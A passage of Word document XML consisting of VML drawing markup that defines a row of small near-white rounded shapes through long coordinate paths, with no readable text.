66,1045,5371,1045,5376,1045,5381,1045,5387,1045,5392,1045,5398,1045,5403,1045,5409,1045,5415,1045,5421,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1046,5427,1046,5427,1046,5427,1046,5427,1046,5427,1047,5427,1047,5427,1047,5427,1048,5427,1048,5427,1048,5427,1049,5427,1049,5427,1049,5427,1050,5427,1050,5427,1051,5427,1052,5427,1052,5427,1053,5427,1054,5427,1054,5427,1055,5427,1056,5427,1057,5427,1057,5427,1058,5427,1059,5427,1060,5427,1061,5427,1062,5427,1063,5427,1065,5427,1066,5427,1067,5427,1068,5427,1070,5427,1071,5427,1073,5427,1074,5427,1076,5427,1077,5427,1079,5427,1081,5427,1082,5427,1084,5427,1086,5427,1088,5427,1090,5427,1092,5427,1094,5427,1096,5427,1099,5427,1101,5427,1103,5427,1106,5427,1108,5427,1111,5427,1114,5427,1116,5427,1119,5427,1122,5427,1125,5427,1128,5427,1131,5427,1134,5427,1138,5427,1141,5427,1144,5427,1148,5427,1151,5427,1155,5427,1159,5427,1162,5427,1166,5427,1170,5427,1174,5427,1178,5427,1183,5427,1187,5427,1191,5427,1196,5427,1201,5427,1205,5427,1210,5427,1215,5427,1220,5427,1225,5427,1230,5427,1235,5427,1241,5427,1246,5427,1252,5427,1257,5427,1263,5427,1269,5427,1275,5427,1281,5427,1287,5427,1293,5427,1300,5427,1300,5427,1300,5427,1300,5427,1300,5427,1300,5427,1300,5427,1300,5427,1300,5427,1300,5427,1300,5427,1300,5427,1300,5426,1300,5426,1300,5426,1300,5426,1300,5426,1300,5426,1300,5426,1300,5426,1300,5426,1300,5425,1300,5425,1300,5425,1300,5425,1300,5425,1300,5424,1300,5424,1300,5424,1300,5423,1300,5423,1300,5422,1300,5422,1300,5422,1300,5421,1300,5421,1300,5420,1300,5420,1300,5419,1300,5418,1300,5418,1300,5417,1300,5416,1300,5415,1300,5415,1300,5414,1300,5413,1300,5412,1300,5411,1300,5410,1300,5409,1300,5408,1300,5407,1300,5406,1300,5404,1300,5403,1300,5402,1300,5400,1300,5399,1300,5397,1300,5396,1300,5394,1300,5393,1300,5391,1300,5389,1300,5388,1300,5386,1300,5384,1300,5382,1300,5380,1300,5378,1300,5376,1300,5374,1300,5371,1300,5369,1300,5367,1300,5364,1300,5362,1300,5359,1300,5356,1300,5354,1300,5351,1300,5348,1300,5345,1300,5342,1300,5339,1300,5336,1300,5333,1300,5330,1300,5326,1300,5323,1300,5319,1300,5316,1300,5312,1300,5308,1300,5305,1300,5301,1300,5297,1300,5293,1300,5288,1300,5284,1300,5280,1300,5276,1300,5271,1300,5266,1300,5262,1300,5257,1300,5252,1300,5247,1300,5242,1300,5237,1300,5232,1300,5227,1300,5221,1300,5216,1300,5210,1300,5204,1300,5199,1300,5193,1300,5187,1300,5187,1300,5187,1300,5187,1300,5187,1300,5187,1300,5187,1300,5187,1300,5187,1300,5187,1300,5187,1300,5187,1300,5187,1299,5187,1299,5187,1299,5187,1299,5187,1299,5187,1299,5187,1299,5187,1299,5187,1299,5187,1298,5187,1298,5187,1298,5187,1298,5187,1298,5187,1297,5187,1297,5187,1297,5187,1296,5187,1296,5187,1296,5187,1295,5187,1295,5187,1294,5187,1294,5187,1293,5187,1293,5187,1292,5187,1291,5187,1291,5187,1290,5187,1289,5187,1288,5187,1288,5187,1287,5187,1286,5187,1285,5187,1284,5187,1283,5187,1282,5187,1281,5187,1280,5187,1278,5187,1277,5187,1276,5187,1274,5187,1273,5187,1272,5187,1270,5187,1269,5187,1267,5187,1265,5187,1264,5187,1262,5187,1260,5187,1258,5187,1256,5187,1254,5187,1252,5187,1250,5187,1248,5187,1245,5187,1243,5187,1241,5187,1238,5187,1236,5187,1233,5187,1231,5187,1228,5187,1225,5187,1222,5187,1219,5187,1216,5187,1213,5187,1210,5187,1207,5187,1203,5187,1200,5187,1196,5187,1193,5187,1189,5187,1186,5187,1182,5187,1178,5187,1174,5187,1170,5187,1166,5187,1161,5187,1157,5187,1153,5187,1148,5187,1144,5187,1139,5187,1134,5187,1129,5187,1124,5187,1119,5187,1114,5187,1109,5187,1104,5187,1098,5187,1093,5187,1087,5187,1081,5187,1075,5187,1069,5187,1063,5187,1057,5187,1051,5187,1045e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:270.500pt;margin-top:51.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5410,1030" coordsize="250,270">
        <v:shape style="position:absolute;left:5410;top:1030;width:250;height:270" coordorigin="5410,1030" coordsize="250,270" path="m5427,1045l5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5427,1045,5428,1045,5428,1045,5428,1045,5428,1045,5428,1045,5428,1045,5429,1045,5429,1045,5429,1045,5430,1045,5430,1045,5430,1045,5431,1045,5431,1045,5431,1045,5432,1045,5432,1045,5433,1045,5433,1045,5434,1045,5435,1045,5435,1045,5436,1045,5437,1045,5437,1045,5438,1045,5439,1045,5440,1045,5441,1045,5442,1045,5442,1045,5443,1045,5445,1045,5446,1045,5447,1045,5448,1045,5449,1045,5450,1045,5452,1045,5453,1045,5455,1045,5456,1045,5458,1045,5459,1045,5461,1045,5462,1045,5464,1045,5466,1045,5468,1045,5470,1045,5472,1045,5474,1045,5476,1045,5478,1045,5480,1045,5482,1045,5484,1045,5487,1045,5489,1045,5492,1045,5494,1045,5497,1045,5500,1045,5502,1045,5505,1045,5508,1045,5511,1045,5514,1045,5517,1045,5521,1045,5524,1045,5527,1045,5531,1045,5534,1045,5538,1045,5541,1045,5545,1045,5549,1045,5553,1045,5557,1045,5561,1045,5565,1045,5569,1045,5574,1045,5578,1045,5582,1045,5587,1045,5592,1045,5596,1045,5601,1045,5606,1045,5611,1045,5616,1045,5622,1045,5627,1045,5632,1045,5638,1045,5643,1045,5649,1045,5655,1045,5661,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1045,5667,1046,5667,1046,5667,1046,5667,1046,5667,1046,5667,1047,5667,1047,5667,1047,5667,1048,5667,1048,5667,1048,5667,1049,5667,1049,5667,1049,5667,1050,5667,1050,5667,1051,5667,1052,5667,1052,5667,1053,5667,1054,5667,1054,5667,1055,5667,1056,5667,1057,5667,1057,5667,1058,5667,1059,5667,1060,5667,1061,5667,1062,5667,1063,5667,1065,5667,1066,5667,1067,5667,1068,5667,1070,5667,1071,5667,1073,5667,1074,5667,1076,5667,1077,5667,1079,5667,1081,5667,1082,5667,1084,5667,1086,5667,1088,5667,1090,5667,1092,5667,1094,5667,1096,5667,1099,5667,1101,5667,1103,5667,1106,5667,1108,5667,1111,5667,1114,5667,1116,5667,1119,5667,1122,5667,1125,5667,1128,5667,1131,5667,1134,5667,1138,5667,1141,5667,1144,5667,1148,5667,1151,5667,1155,5667,1159,5667,1162,5667,1166,5667,1170,5667,1174,5667,1178,5667,1183,5667,1187,5667,1191,5667,1196,5667,1201,5667,1205,5667,1210,5667,1215,5667,1220,5667,1225,5667,1230,5667,1235,5667,1241,5667,1246,5667,1252,5667,1257,5667,1263,5667,1269,5667,1275,5667,1281,5667,1287,5667,1293,5667,1300,5667,1300,5667,1300,5667,1300,5667,1300,5667,1300,5667,1300,5667,1300,5667,1300,5667,1300,5667,1300,5667,1300,5667,1300,5667,1300,5667,1300,5666,1300,5666,1300,5666,1300,5666,1300,5666,1300,5666,1300,5666,1300,5666,1300,5665,1300,5665,1300,5665,1300,5665,1300,5664,1300,5664,1300,5664,1300,5663,1300,5663,1300,5663,1300,5662,1300,5662,1300,5661,1300,5661,1300,5660,1300,5660,1300,5659,1300,5658,1300,5658,1300,5657,1300,5656,1300,5656,1300,5655,1300,5654,1300,5653,1300,5652,1300,5651,1300,5650,1300,5649,1300,5648,1300,5647,1300,5646,1300,5644,1300,5643,1300,5642,1300,5640,1300,5639,1300,5638,1300,5636,1300,5635,1300,5633,1300,5631,1300,5630,1300,5628,1300,5626,1300,5624,1300,5622,1300,5620,1300,5618,1300,5616,1300,5614,1300,5611,1300,5609,1300,5607,1300,5604,1300,5602,1300,5599,1300,5597,1300,5594,1300,5591,1300,5588,1300,5585,1300,5582,1300,5579,1300,5576,1300,5573,1300,5570,1300,5566,1300,5563,1300,5559,1300,5556,1300,5552,1300,5549,1300,5545,1300,5541,1300,5537,1300,5533,1300,5529,1300,5524,1300,5520,1300,5516,1300,5511,1300,5507,1300,5502,1300,5497,1300,5492,1300,5487,1300,5482,1300,5477,1300,5472,1300,5467,1300,5461,1300,5456,1300,5450,1300,5444,1300,5439,1300,5433,1300,5427,1300,5427,1300,5427,1300,5427,1300,5427,1300,5427,1300,5427,1300,5427,1300,5427,1300,5427,1300,5427,1300,5427,1300,5427,1299,5427,1299,5427,1299,5427,1299,5427,1299,5427,1299,5427,1299,5427,1299,5427,1299,5427,1298,5427,1298,5427,1298,5427,1298,5427,1298,5427,1297,5427,1297,5427,1297,5427,1296,5427,1296,5427,1296,5427,1295,5427,1295,5427,1294,5427,1294,5427,1293,5427,1293,5427,1292,5427,1291,5427,1291,5427,1290,5427,1289,5427,1288,5427,1288,5427,1287,5427,1286,5427,1285,5427,1284,5427,1283,5427,1282,5427,1281,5427,1280,5427,1278,5427,1277,5427,1276,5427,1274,5427,1273,5427,1272,5427,1270,5427,1269,5427,1267,5427,1265,5427,1264,5427,1262,5427,1260,5427,1258,5427,1256,5427,1254,5427,1252,5427,1250,5427,1248,5427,1245,5427,1243,5427,1241,5427,1238,5427,1236,5427,1233,5427,1231,5427,1228,5427,1225,5427,1222,5427,1219,5427,1216,5427,1213,5427,1210,5427,1207,5427,1203,5427,1200,5427,1196,5427,1193,5427,1189,5427,1186,5427,1182,5427,1178,5427,1174,5427,1170,5427,1166,5427,1161,5427,1157,5427,1153,5427,1148,5427,1144,5427,1139,5427,1134,5427,1129,5427,1124,5427,1119,5427,1114,5427,1109,5427,1104,5427,1098,5427,1093,5427,1087,5427,1081,5427,1075,5427,1069,5427,1063,5427,1057,5427,1051,5427,1045e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:288.500pt;margin-top:51.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5770,1030" coordsize="250,270">
        <v:shape style="position:absolute;left:5770;top:1030;width:250;height:270" coordorigin="5770,1030" coordsize="250,270" path="m5787,1045l5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5787,1045,5788,1045,5788,1045,5788,1045,5788,1045,5788,1045,5788,1045,5789,1045,5789,1045,5789,1045,5789,1045,5790,1045,5790,1045,5790,1045,5791,1045,5791,1045,5792,1045,5792,1045,5793,1045,5793,1045,5794,1045,5794,1045,5795,1045,5795,1045,5796,1045,5797,1045,5797,1045,5798,1045,5799,1045,5800,1045,5801,1045,5802,1045,5803,1045,5804,1045,5805,1045,5806,1045,5807,1045,5808,1045,5809,1045,5811,1045,5812,1045,5813,1045,5815,1045,5816,1045,5818,1045,5819,1045,5821,1045,5823,1045,5824,1045,5826,1045,5828,1045,5830,1045,5832,1045,5834,1045,5836,1045,5838,1045,5840,1045,5842,1045,5845,1045,5847,1045,5849,1045,5852,1045,5855,1045,5857,1045,5860,1045,5863,1045,5865,1045,5868,1045,5871,1045,5874,1045,5878,1045,5881,1045,5884,1045,5887,1045,5891,1045,5894,1045,5898,1045,5902,1045,5905,1045,5909,1045,5913,1045,5917,1045,5921,1045,5925,1045,5929,1045,5934,1045,5938,1045,5943,1045,5947,1045,5952,1045,5957,1045,5961,1045,5966,1045,5971,1045,5977,1045,5982,1045,5987,1045,5993,1045,5998,1045,6004,1045,6009,1045,6015,1045,6021,1045,6027,1045,6027,1045,6027,1045,6027,1045,6027,1045,6027,1045,6027,1045,6027,1045,6027,1045,6027,1045,6027,1045,6027,1045,6027,1045,6027,1045,6027,1045,6027,1045,6027,1045,6027,1045,6027,1045,6027,1045,6027,1046,6027,1046,6027,1046,6027,1046,6027,1046,6027,1047,6027,1047,6027,1047,6027,1048,6027,1048,6027,1048,6027,1049,6027,1049,6027,1049,6027,1050,6027,1050,6027,1051,6027,1052,6027,1052,6027,1053,6027,1054,6027,1054,6027,1055,6027,1056,6027,1057,6027,1057,6027,1058,6027,1059,6027,1060,6027,1061,6027,1062,6027,1063,6027,1065,6027,1066,6027,1067,6027,1068,6027,1070,6027,1071,6027,1073,6027,1074,6027,1076,6027,1077,6027,1079,6027,1081,6027,1082,6027,1084,6027,1086,6027,1088,6027,1090,6027,1092,6027,1094,6027,1096,6027,1099,6027,1101,6027,1103,6027,1106,6027,1108,6027,1111,6027,1114,6027,1116,6027,1119,6027,1122,6027,1125,6027,1128,6027,1131,6027,1134,6027,1138,6027,1141,6027,1144,6027,1148,6027,1151,6027,1155,6027,1159,6027,1162,6027,1166,6027,1170,6027,1174,6027,1178,6027,1183,6027,1187,6027,1191,6027,1196,6027,1201,6027,1205,6027,1210,6027,1215,6027,1220,6027,1225,6027,1230,6027,1235,6027,1241,6027,1246,6027,1252,6027,1257,6027,1263,6027,1269,6027,1275,6027,1281,6027,1287,6027,1293,6027,1300,6027,1300,6027,1300,6027,1300,6027,1300,6027,1300,6027,1300,6027,1300,6027,1300,6027,1300,6027,1300,6027,1300,6027,1300,6027,1300,6027,1300,6027,1300,6027,1300,6026,1300,6026,1300,6026,1300,6026,1300,6026,1300,6026,1300,6026,1300,6025,1300,6025,1300,6025,1300,6025,1300,6024,1300,6024,1300,6024,1300,6023,1300,6023,1300,6022,1300,6022,1300,6021,1300,6021,1300,6020,1300,6020,1300,6019,1300,6019,1300,6018,1300,6017,1300,6016,1300,6016,1300,6015,1300,6014,1300,6013,1300,6012,1300,6011,1300,6010,1300,6009,1300,6008,1300,6007,1300,6006,1300,6005,1300,6003,1300,6002,1300,6001,1300,5999,1300,5998,1300,5996,1300,5995,1300,5993,1300,5991,1300,5990,1300,5988,1300,5986,1300,5984,1300,5982,1300,5980,1300,5978,1300,5976,1300,5974,1300,5972,1300,5969,1300,5967,1300,5964,1300,5962,1300,5959,1300,5957,1300,5954,1300,5951,1300,5948,1300,5946,1300,5943,1300,5940,1300,5936,1300,5933,1300,5930,1300,5927,1300,5923,1300,5920,1300,5916,1300,5912,1300,5909,1300,5905,1300,5901,1300,5897,1300,5893,1300,5889,1300,5885,1300,5880,1300,5876,1300,5871,1300,5867,1300,5862,1300,5857,1300,5852,1300,5848,1300,5843,1300,5837,1300,5832,1300,5827,1300,5821,1300,5816,1300,5810,1300,5805,1300,5799,1300,5793,1300,5787,1300,5787,1300,5787,1300,5787,1300,5787,1300,5787,1300,5787,1300,5787,1300,5787,1300,5787,1300,5787,1300,5787,1300,5787,1299,5787,1299,5787,1299,5787,1299,5787,1299,5787,1299,5787,1299,5787,1299,5787,1299,5787,1298,5787,1298,5787,1298,5787,1298,5787,1298,5787,1297,5787,1297,5787,1297,5787,1296,5787,1296,5787,1296,5787,1295,5787,1295,5787,1294,5787,1294,5787,1293,5787,1293,5787,1292,5787,1291,5787,1291,5787,1290,5787,1289,5787,1288,5787,1288,5787,1287,5787,1286,5787,1285,5787,1284,5787,1283,5787,1282,5787,1281,5787,1280,5787,1278,5787,1277,5787,1276,5787,1274,5787,1273,5787,1272,5787,1270,5787,1269,5787,1267,5787,1265,5787,1264,5787,1262,5787,1260,5787,1258,5787,1256,5787,1254,5787,1252,5787,1250,5787,1248,5787,1245,5787,1243,5787,1241,5787,1238,5787,1236,5787,1233,5787,1231,5787,1228,5787,1225,5787,1222,5787,1219,5787,1216,5787,1213,5787,1210,5787,1207,5787,1203,5787,1200,5787,1196,5787,1193,5787,1189,5787,1186,5787,1182,5787,1178,5787,1174,5787,1170,5787,1166,5787,1161,5787,1157,5787,1153,5787,1148,5787,1144,5787,1139,5787,1134,5787,1129,5787,1124,5787,1119,5787,1114,5787,1109,5787,1104,5787,1098,5787,1093,5787,1087,5787,1081,5787,1075,5787,1069,5787,1063,5787,1057,5787,1051,5787,1045e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:300.500pt;margin-top:51.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6010,1030" coordsize="250,270">
        <v:shape style="position:absolute;left:6010;top:1030;width:250;height:270" coordorigin="6010,1030" coordsize="250,270" path="m6027,1045l6027,1045,6027,1045,6027,1045,6027,1045,6027,1045,6027,1045,6027,1045,6027,1045,6027,1045,6027,1045,6027,1045,6027,1045,6027,1045,6027,1045,6027,1045,6028,1045,6028,1045,6028,1045,6028,1045,6028,1045,6028,1045,6028,1045,6029,1045,6029,1045,6029,1045,6029,1045,6030,1045,6030,1045,6030,1045,6031,1045,6031,1045,6031,1045,6032,1045,6032,1045,6033,1045,6033,1045,6034,1045,6034,1045,6035,1045,6035,1045,6036,1045,6037,1045,6038,1045,6038,1045,6039,1045,6040,1045,6041,1045,6042,1045,6043,1045,6044,1045,6045,1045,6046,1045,6047,1045,6048,1045,6049,1045,6051,1045,6052,1045,6053,1045,6055,1045,6056,1045,6058,1045,6059,1045,6061,1045,6063,1045,6064,1045,6066,1045,6068,1045,6070,1045,6072,1045,6074,1045,6076,1045,6078,1045,6080,1045,6082,1045,6085,1045,6087,1045,6090,1045,6092,1045,6095,1045,6097,1045,6100,1045,6103,1045,6106,1045,6109,1045,6111,1045,6115,1045,6118,1045,6121,1045,6124,1045,6127,1045,6131,1045,6134,1045,6138,1045,6142,1045,6145,1045,6149,1045,6153,1045,6157,1045,6161,1045,6165,1045,6170,1045,6174,1045,6178,1045,6183,1045,6187,1045,6192,1045,6197,1045,6202,1045,6207,1045,6212,1045,6217,1045,6222,1045,6227,1045,6233,1045,6238,1045,6244,1045,6249,1045,6255,1045,6261,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1046,6267,1046,6267,1046,6267,1046,6267,1046,6267,1047,6267,1047,6267,1047,6267,1048,6267,1048,6267,1048,6267,1049,6267,1049,6267,1049,6267,1050,6267,1050,6267,1051,6267,1052,6267,1052,6267,1053,6267,1054,6267,1054,6267,1055,6267,1056,6267,1057,6267,1057,6267,1058,6267,1059,6267,1060,6267,1061,6267,1062,6267,1063,6267,1065,6267,1066,6267,1067,6267,1068,6267,1070,6267,1071,6267,1073,6267,1074,6267,1076,6267,1077,6267,1079,6267,1081,6267,1082,6267,1084,6267,1086,6267,1088,6267,1090,6267,1092,6267,1094,6267,1096,6267,1099,6267,1101,6267,1103,6267,1106,6267,1108,6267,1111,6267,1114,6267,1116,6267,1119,6267,1122,6267,1125,6267,1128,6267,1131,6267,1134,6267,1138,6267,1141,6267,1144,6267,1148,6267,1151,6267,1155,6267,1159,6267,1162,6267,1166,6267,1170,6267,1174,6267,1178,6267,1183,6267,1187,6267,1191,6267,1196,6267,1201,6267,1205,6267,1210,6267,1215,6267,1220,6267,1225,6267,1230,6267,1235,6267,1241,6267,1246,6267,1252,6267,1257,6267,1263,6267,1269,6267,1275,6267,1281,6267,1287,6267,1293,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6266,1300,6266,1300,6266,1300,6266,1300,6266,1300,6266,1300,6265,1300,6265,1300,6265,1300,6265,1300,6264,1300,6264,1300,6264,1300,6263,1300,6263,1300,6262,1300,6262,1300,6262,1300,6261,1300,6261,1300,6260,1300,6259,1300,6259,1300,6258,1300,6257,1300,6257,1300,6256,1300,6255,1300,6254,1300,6253,1300,6252,1300,6251,1300,6250,1300,6249,1300,6248,1300,6247,1300,6246,1300,6245,1300,6243,1300,6242,1300,6241,1300,6239,1300,6238,1300,6236,1300,6235,1300,6233,1300,6232,1300,6230,1300,6228,1300,6226,1300,6224,1300,6222,1300,6220,1300,6218,1300,6216,1300,6214,1300,6212,1300,6209,1300,6207,1300,6205,1300,6202,1300,6200,1300,6197,1300,6194,1300,6191,1300,6189,1300,6186,1300,6183,1300,6180,1300,6177,1300,6173,1300,6170,1300,6167,1300,6163,1300,6160,1300,6156,1300,6153,1300,6149,1300,6145,1300,6141,1300,6137,1300,6133,1300,6129,1300,6125,1300,6120,1300,6116,1300,6111,1300,6107,1300,6102,1300,6097,1300,6093,1300,6088,1300,6083,1300,6078,1300,6072,1300,6067,1300,6062,1300,6056,1300,6050,1300,6045,1300,6039,1300,6033,1300,6027,1300,6027,1300,6027,1300,6027,1300,6027,1300,6027,1300,6027,1300,6027,1300,6027,1300,6027,1300,6027,1300,6027,1300,6027,1299,6027,1299,6027,1299,6027,1299,6027,1299,6027,1299,6027,1299,6027,1299,6027,1299,6027,1298,6027,1298,6027,1298,6027,1298,6027,1298,6027,1297,6027,1297,6027,1297,6027,1296,6027,1296,6027,1296,6027,1295,6027,1295,6027,1294,6027,1294,6027,1293,6027,1293,6027,1292,6027,1291,6027,1291,6027,1290,6027,1289,6027,1288,6027,1288,6027,1287,6027,1286,6027,1285,6027,1284,6027,1283,6027,1282,6027,1281,6027,1280,6027,1278,6027,1277,6027,1276,6027,1274,6027,1273,6027,1272,6027,1270,6027,1269,6027,1267,6027,1265,6027,1264,6027,1262,6027,1260,6027,1258,6027,1256,6027,1254,6027,1252,6027,1250,6027,1248,6027,1245,6027,1243,6027,1241,6027,1238,6027,1236,6027,1233,6027,1231,6027,1228,6027,1225,6027,1222,6027,1219,6027,1216,6027,1213,6027,1210,6027,1207,6027,1203,6027,1200,6027,1196,6027,1193,6027,1189,6027,1186,6027,1182,6027,1178,6027,1174,6027,1170,6027,1166,6027,1161,6027,1157,6027,1153,6027,1148,6027,1144,6027,1139,6027,1134,6027,1129,6027,1124,6027,1119,6027,1114,6027,1109,6027,1104,6027,1098,6027,1093,6027,1087,6027,1081,6027,1075,6027,1069,6027,1063,6027,1057,6027,1051,6027,1045e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:312.500pt;margin-top:51.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6250,1030" coordsize="250,270">
        <v:shape style="position:absolute;left:6250;top:1030;width:250;height:270" coordorigin="6250,1030" coordsize="250,270" path="m6267,1045l6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6267,1045,6268,1045,6268,1045,6268,1045,6268,1045,6268,1045,6268,1045,6268,1045,6268,1045,6269,1045,6269,1045,6269,1045,6269,1045,6270,1045,6270,1045,6270,1045,6271,1045,6271,1045,6271,1045,6272,1045,6272,1045,6273,1045,6273,1045,6274,1045,6274,1045,6275,1045,6276,1045,6276,1045,6277,1045,6278,1045,6278,1045,6279,1045,6280,1045,6281,1045,6282,1045,6283,1045,6284,1045,6285,1045,6286,1045,6287,1045,6288,1045,6290,1045,6291,1045,6292,1045,6294,1045,6295,1045,6296,1045,6298,1045,6299,1045,6301,1045,6303,1045,6305,1045,6306,1045,6308,1045,6310,1045,6312,1045,6314,1045,6316,1045,6318,1045,6320,1045,6323,1045,6325,1045,6327,1045,6330,1045,6332,1045,6335,1045,6337,1045,6340,1045,6343,1045,6346,1045,6349,1045,6352,1045,6355,1045,6358,1045,6361,1045,6364,1045,6368,1045,6371,1045,6375,1045,6378,1045,6382,1045,6386,1045,6389,1045,6393,1045,6397,1045,6401,1045,6405,1045,6410,1045,6414,1045,6418,1045,6423,1045,6427,1045,6432,1045,6437,1045,6442,1045,6447,1045,6452,1045,6457,1045,6462,1045,6467,1045,6473,1045,6478,1045,6484,1045,6490,1045,6495,1045,6501,1045,6507,1045,6507,1045,6507,1045,6507,1045,6507,1045,6507,1045,6507,1045,6507,1045,6507,1045,6507,1045,6507,1045,6507,1045,6507,1045,6507,1045,6507,1045,6507,1045,6507,1045,6507,1045,6507,1045,6507,1045,6507,1046,6507,1046,6507,1046,6507,1046,6507,1046,6507,1047,6507,1047,6507,1047,6507,1048,6507,1048,6507,1048,6507,1049,6507,1049,6507,1049,6507,1050,6507,1050,6507,1051,6507,1052,6507,1052,6507,1053,6507,1054,6507,1054,6507,1055,6507,1056,6507,1057,6507,1057,6507,1058,6507,1059,6507,1060,6507,1061,6507,1062,6507,1063,6507,1065,6507,1066,6507,1067,6507,1068,6507,1070,6507,1071,6507,1073,6507,1074,6507,1076,6507,1077,6507,1079,6507,1081,6507,1082,6507,1084,6507,1086,6507,1088,6507,1090,6507,1092,6507,1094,6507,1096,6507,1099,6507,1101,6507,1103,6507,1106,6507,1108,6507,1111,6507,1114,6507,1116,6507,1119,6507,1122,6507,1125,6507,1128,6507,1131,6507,1134,6507,1138,6507,1141,6507,1144,6507,1148,6507,1151,6507,1155,6507,1159,6507,1162,6507,1166,6507,1170,6507,1174,6507,1178,6507,1183,6507,1187,6507,1191,6507,1196,6507,1201,6507,1205,6507,1210,6507,1215,6507,1220,6507,1225,6507,1230,6507,1235,6507,1241,6507,1246,6507,1252,6507,1257,6507,1263,6507,1269,6507,1275,6507,1281,6507,1287,6507,1293,6507,1300,6507,1300,6507,1300,6507,1300,6507,1300,6507,1300,6507,1300,6507,1300,6507,1300,6507,1300,6507,1300,6507,1300,6507,1300,6507,1300,6507,1300,6507,1300,6507,1300,6507,1300,6507,1300,6506,1300,6506,1300,6506,1300,6506,1300,6506,1300,6506,1300,6505,1300,6505,1300,6505,1300,6504,1300,6504,1300,6504,1300,6503,1300,6503,1300,6503,1300,6502,1300,6502,1300,6501,1300,6501,1300,6500,1300,6499,1300,6499,1300,6498,1300,6497,1300,6497,1300,6496,1300,6495,1300,6494,1300,6493,1300,6492,1300,6492,1300,6491,1300,6489,1300,6488,1300,6487,1300,6486,1300,6485,1300,6484,1300,6482,1300,6481,1300,6479,1300,6478,1300,6476,1300,6475,1300,6473,1300,6472,1300,6470,1300,6468,1300,6466,1300,6464,1300,6462,1300,6460,1300,6458,1300,6456,1300,6454,1300,6452,1300,6450,1300,6447,1300,6445,1300,6442,1300,6440,1300,6437,1300,6434,1300,6432,1300,6429,1300,6426,1300,6423,1300,6420,1300,6417,1300,6413,1300,6410,1300,6407,1300,6403,1300,6400,1300,6396,1300,6393,1300,6389,1300,6385,1300,6381,1300,6377,1300,6373,1300,6369,1300,6365,1300,6360,1300,6356,1300,6352,1300,6347,1300,6342,1300,6338,1300,6333,1300,6328,1300,6323,1300,6318,1300,6312,1300,6307,1300,6302,1300,6296,1300,6291,1300,6285,1300,6279,1300,6273,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1300,6267,1299,6267,1299,6267,1299,6267,1299,6267,1299,6267,1299,6267,1299,6267,1299,6267,1299,6267,1298,6267,1298,6267,1298,6267,1298,6267,1298,6267,1297,6267,1297,6267,1297,6267,1296,6267,1296,6267,1296,6267,1295,6267,1295,6267,1294,6267,1294,6267,1293,6267,1293,6267,1292,6267,1291,6267,1291,6267,1290,6267,1289,6267,1288,6267,1288,6267,1287,6267,1286,6267,1285,6267,1284,6267,1283,6267,1282,6267,1281,6267,1280,6267,1278,6267,1277,6267,1276,6267,1274,6267,1273,6267,1272,6267,1270,6267,1269,6267,1267,6267,1265,6267,1264,6267,1262,6267,1260,6267,1258,6267,1256,6267,1254,6267,1252,6267,1250,6267,1248,6267,1245,6267,1243,6267,1241,6267,1238,6267,1236,6267,1233,6267,1231,6267,1228,6267,1225,6267,1222,6267,1219,6267,1216,6267,1213,6267,1210,6267,1207,6267,1203,6267,1200,6267,1196,6267,1193,6267,1189,6267,1186,6267,1182,6267,1178,6267,1174,6267,1170,6267,1166,6267,1161,6267,1157,6267,1153,6267,1148,6267,1144,6267,1139,6267,1134,6267,1129,6267,1124,6267,1119,6267,1114,6267,1109,6267,1104,6267,1098,6267,1093,6267,1087,6267,1081,6267,1075,6267,1069,6267,1063,6267,1057,6267,1051,6267,1045e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:324.500pt;margin-top:51.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6490,1030" coordsize="250,270">
